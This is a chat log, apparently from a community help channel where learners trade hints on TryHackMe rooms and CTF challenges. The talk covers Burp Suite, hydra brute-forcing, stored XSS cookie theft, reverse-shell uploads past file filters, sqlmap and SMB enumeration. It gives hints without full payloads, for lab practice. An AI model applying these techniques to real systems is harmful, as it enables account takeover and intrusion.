I can't find how the user's shell is set. I've googled and trial & errored for a while now. I'm guessing it's in /bin/bash but I don't know how to see the contents of it 😦

Is your request appearing in Burp?

Only one

Just after enabling interception

Other sites requests are showing fine

Is this the first web site you've tried tonight? Or have you just finished one and moved onto this one? I know if you've restarted the target VM your hosts file will be incorrect

You need to look in the passwd file

no, it is not the first one

Does it load if you are not using Burp?

nwm

yes, it was

I resolved it, seems like there was multiple IPs in my hosts file

After removal, works fine

Ahhh that one gets a lot of people

Maybe put it in hints, or somehow mark that this may be a problem

Hello! For Linux fundamentals part 2 is talking about ls command and ask "What flag would we use to display the output in a "human-readable" way?". The answer is in the format of 2 char, I thought is ||-l|| Can someone help me? I really don't get it :)))

Hey, did you checked the man page?

I got it now😅

nice, next time try searching the man page with grep 👍

I thought is just metaforic :))

Hi, im doing the XSS playground room for stored XSS. The task tells me to put a script that sends a cookie to the attacker machine whenever a user visits the webpage. It says to wait for a user name Jack to visit the webpage. I waited and refreshed the page for quite a while but did not get the cookie from Jack. What could I be doing wrong?

Nvm, problem solved. The cookie looks alike and i've mistaken it with my cookie 😫

Can Anyone help me with "A different CTF"?

I need hints

Specify your question please and people are ready to give you hints

Where to start looking?

I found a wordlist at /announcements

I found a /phpmyadmin

Also a /phpmyadmin/setup

I assume I have to brute force the /phpmyadmin/setup with hydra specifying username as "admin" and password list as "wordlist.txt"

But it's taking too long so I just wanted to know, am I going in the right direction?

Maybe in the wordlist there is duplicate word ?

What should I do??

There is a command Line to eliminate all the duplicates word

I don't know that 😅

Would you be so kind so as to share the command?

try this ? sort -nu inputfile.txt -o outputfile.txt

what is the ctf your are doing ?

A Different CTF

uh,well.I am stuck while trying to deploy a machine in linuxfundamentals1

I am not able to connect on the IP

you try to ping it ?

ye

works that way

but can't access on browser

what is the nmap result ?

I mean for the linux machine

the virtual machine

i don't know i use my own VM

what about windows machine

lol

It's kinda boring to download

I'm trying to install seclists on the attackbox for the OWASP Juice Shop room, but i keep getting the error "unable to locate package seclists"

You can download seclists from github using git clone and then move seclists to /usr/share directory

oh i tried using git

but i derped and forgot where it put it xD

Didn't realise it was put in the /root folder and not where it's meant to go

Thanks!

230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 500 Illegal PORT command. ftp: bind: Address already in use ftp> pass Passive mode on. ftp> ls 227 Entering Passive Mode (10,10,169,101,174,110) hello guys i have a problem, when i want to connect with ftp the server do give me back the listing

is this a port problems ?

Guys, what am I missing, I am stuck with Jewel (file uploads) challenge. I uploaded my Node.js revshell, found it, and can't execute it, admin page keep saying, that there is no module

Are the jpgs in the folder you mention in your admin page screenshot?

Did you manipulate the magic hex?

Yes

Yes, also, according to hints they should be there

Sadly I did not make a writeup for that room and I only remember that there was something with the magic hex or the file extension. Try to leave everything as it is that gets checked on the client side and remove the javascript that performs the clientside checks with burp

Without that JS button select doesn't seem to work, but I'll try, thanks

Gave +1 Rep to @rain latch

show me

Show you what?

only remove the client side checks javascript file (whatever exactly it's called) not the one that performs the upload itself

jesus

no need to be so rude to me

i was tyrna help

he was just asking?

he is not availible, come back later

lol

show me da problem i fix for free 4 u

hahaha

I think for the challenge, you don't change the hex or it doesn't work

Can anybody give a hint to Jenkins room

Finished scanning and I’m kind of lost
Found login page on port 8080

That's what I said since the hex check is clientside

afaik

Don’t know what to do from there
Tired doing dir enumeration
Nothing coming out of there

Try some default credentials 😄

Thank you…. Don’t want to call myself stupid for not thinking in that direction

Gave +1 Rep to @rain latch

Your welcome

When will the crontab on the deployed instance (10.10.55.242) run?

Mind giving some info?

That is not a number, that is a word.

That is Linux fundamentals PT 3, if I recall correctly

ah well such info should be included in a question and then you're right it's a word 😄

@rain latch You helped me yesterday on this question, lol xD

got quite some stuff on my mind i dont remember such stuff tbh ¯_(ツ)_/¯

guys, where do i get the user's account status on windows server?

Account is ___

windowsfundamentals1xbx room

This is a trick question

Yea my message above is the "format" you can read the account status in local users and groups for example

There check the properties of the account

The answer is account is ********

So now u can give the answers..

^

ok

i got the right answer, but i think it is wrong (because that option is unchecked)

I was literally just doing the room and the option is checked for me

are you sure you were looking at the correct account?

Hi everyone, newbee here. i am stuck on a question. what is networking? what is the key term for devices thatt are connected together ?

did you read the first sentence

I have read the whole thing loads of time, second day trying to figure it out 🤦

the answer lies literally within the first sentence

Oh dear. i will look at the first sentence thank you

no worries

I'm doing room Agent-Sudo

Where will I get the Zip file?

Room name: rootme
When I'm uploading a empty file .php5,.phtml extension it's being uploaded but when I'm uploading the actual shell ...it's not being uploaded..what might be the reason??

!docs verify

Follow this link to verify yourself and provide screenshots

Besides that, there are some directories which you can found using gobuster/dirsearch.

All the uploaded files above are normal files...but when I'm trying to upload the pentest monkey reverse shell it's being showing that the "connection was reset"

Terminate the deployed machine and re-deploy it again because such thing shouldn't happen

Yaa..but still the same issue

Is the problem occuring while uploading the rev shell or is it when executing it to gain reverse connection?

when uploading the shell

Try to upload newly downloaded php-reverse-shell and see if it works

But that's strange anyways

I'm having issues with the CC: Pentesting room, task 18. Every time I run the sqlmap command I get an error back

You have to provide a parameter which might be vulnerable to sqli just like http://foobar.xyz/secret/?id= and here, if you can see, id parameter might be (might not) vulnerable to sqli

ohhh okay, so I've skipped a step haha

I still can't seem to get it to do much 😕

There is a message box on the site, but entering text into it doesn't change the url

There's a "forms" option on sqlmap in case you got a form on the website but no parameter in the url

It should even be --forms if i remember correctly

Yeah it was, thanks 😄 I got it eventually, but then got stuck with finding the flag because my database dumps were empty databases

Hey! Hope everyone is having a good week. I am working on the Bounty Hacker Room and am having a difficult time with Hydra, it says that it will take 2 hours to complete with the common_root.txt attacking ssh. Is there a way to speed this up? Hydra does allow for up to 64 tasks at a time but this gave me an error.

Did you get the creds ? From /announcements

Use stegseek or stegbrute

Thanks for getting back to me. I have not yet. Where is the announcements directory? I was able to find the user login as lin in the task.txt file.

Man, I was way over thinking owasp top 10, task 19 😮‍💨

Did you find the other file besides tasks.txt in ftp?

Figure out what can you do with it.

Yaa..finally it worked , uploaded a web shell to excute commands and from their spawned a shell using python...but idk y the pentestmonkey rev shell won't uploaded.

could anyone help me with 'network services' on exploiting smb?

Ask your question (and tell us the task number) and if someone can help, they will

Hello,

I am on "Network Services" module and I am trying to launch my machine. I clicked on "Start Machine" >> "Start Hackbox" in machine I am trying ssh tryhackme@(ip addres) and entering password (tryhackme) but its saying "permission denied"

Hello,

I am on "Network Services" module and I am trying to launch my machine. I clicked on "Start Machine" >> "Start Hackbox" in machine I am trying ssh tryhackme@(ip addres) and entering password (tryhackme) but its saying "permission denied"

Just looking now, which task number is it?

Complete Beginner >> Network Exploitation Basics >> Network Services

Task 3

@vital crown

Looking at that task you don't need to SSH into it. You're doing SMB enumeration which you would run from your attackbox

ohhh ok..

Good morning all. I am currently stuck on Task 4 in the Network Services Room. The question is:

"Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?"

For the life of me I cannot find anything that indicates who the profile folder belongs to. There's an interesting .txt file but I can't seem to read it's content. nano, vi, cat and more do not provide any help. 😕

Anyone familiar with this?

Found the solution:
Once Connected -

help (Get a listing of what commands are available)

ls (List share content)

get "filename" (This will save a copy of the file on your local machine that you can read later)

My get command kept failing because I was not using quotes around the file name.

Hope this helps!

Hello, @white salmon !
I'm stuck at the same question. I just wrote the SQL query, but it don't work.
Can you give me an idea?

hi, any hint about the Cold VVars room

im i looking at the wrong thing? if so what should i be looking for roughly

nevermind

done it

does any one here know when coldvvar was released stuck on privesc to 2nd user

im stuck too

hello,i need help, i am still sucks at this "wget" why still refused? i am trying with AttackTheBox and my machine, but not working.

Hi all - I'm on the vulnversity room and the intruder sniper payload doesn't seem to work as designed

I get 200 status for all extensions

when actually .php isn't allowed.. shouldn't it show something other than 200?

my settings match the room suggestion too..

you have a web server running from the source to respond to the wget on that port?

did you start the python3 http seerver on the victum box?

yeah from the source, i try it

so if you do an nmap for port 8000 on the victim box you see it open?

yes u mean python3 -m http.server? i already did it

rustscan –a 10.10.215.52

do that and check you see port 8000

looks like its not open perhaps

yes it's open
i try nmap -sV -sC

hmmm

what attackbox you using? the tryhackme?

yups,tryhackme

it looks like your running the command on the victim box rather than the tryhackme box?

thats what my cmd looks like on tryhackme box

I think your box has port 80 open.. not 8000

that also may be the issue

owh thanks i will try again later

Gave +1 Rep to @twilit kraken

The reason you are getting 200 statuses, is because the web page itself is loading up correctly. What I would suggest is try a manual upload and see what error is mentioned on the webpage when you upload an incorrect format, then in Burp use the Grep-Match option in the Intruder options to flag any response that includes that text. The rationale being if there is no error text flagged then it might be a successful upload

ahhhaaaa perfect thanks that makes sense

oddly thats not working.. I am prob being a wally still

did it flag in them in the results?

no I don't think so.. I also tried setting a location so it knows where to look but that didn't pick anything up also

the above screenie is with the grep set

just booting the room up

oh thanks Gogs really appreciate that.. while I know the answer to the next question the fact that Burp doesn't flag it means I must be doing something wrong I guess

Gave +1 Rep to @vital crown

just added in response field.. is this what i am supposed to look for?

doesn't look right still to me

based on the answer

as it should dhow 0 respinse for one of those

sorted!

needed "case sensitive match"

finickity thing lol

yup! but thanks so much I didn't know about that option

Gave +1 Rep to @vital crown

No problem. i think it gets mentioned on one of the rooms, that's the only reason I know of it

Its been annoying me for days that one tried all sorts hahaha.. didn't wanna move on till I understood why

In the Retro CTF room I've got the problem that I cannot choose a browser (or app) to open the certificate URL; anyone knows why or how to fix that?

The bit that got me on that room was I had URL encoding turned on and it kept on turning the . into %2e

Yeah I did spot that one today when i was looking through results too. And then remembered to turn that off from another room when fuzzing.

but I also didn't spot that for a week haha

soooo on same room.. I'm trying to get the file contents across

its creating the file but not transferring file content oddly and the nc session kinda just sat there waiting as though I need to do something else

actually ignore me thats odd it did it that time!

Anyone who did Cold VVar?

@shut pollen i'm doing it. i made the first enumeration for the moment. I have to go outside. i will continue later.

@twilit kraken I didn't read your entire problem, but something else to look for is the response length. There are times/rooms where the response code will still be 200, but the message that it gives back is different.

im stuck too trying to privesc to 2nd user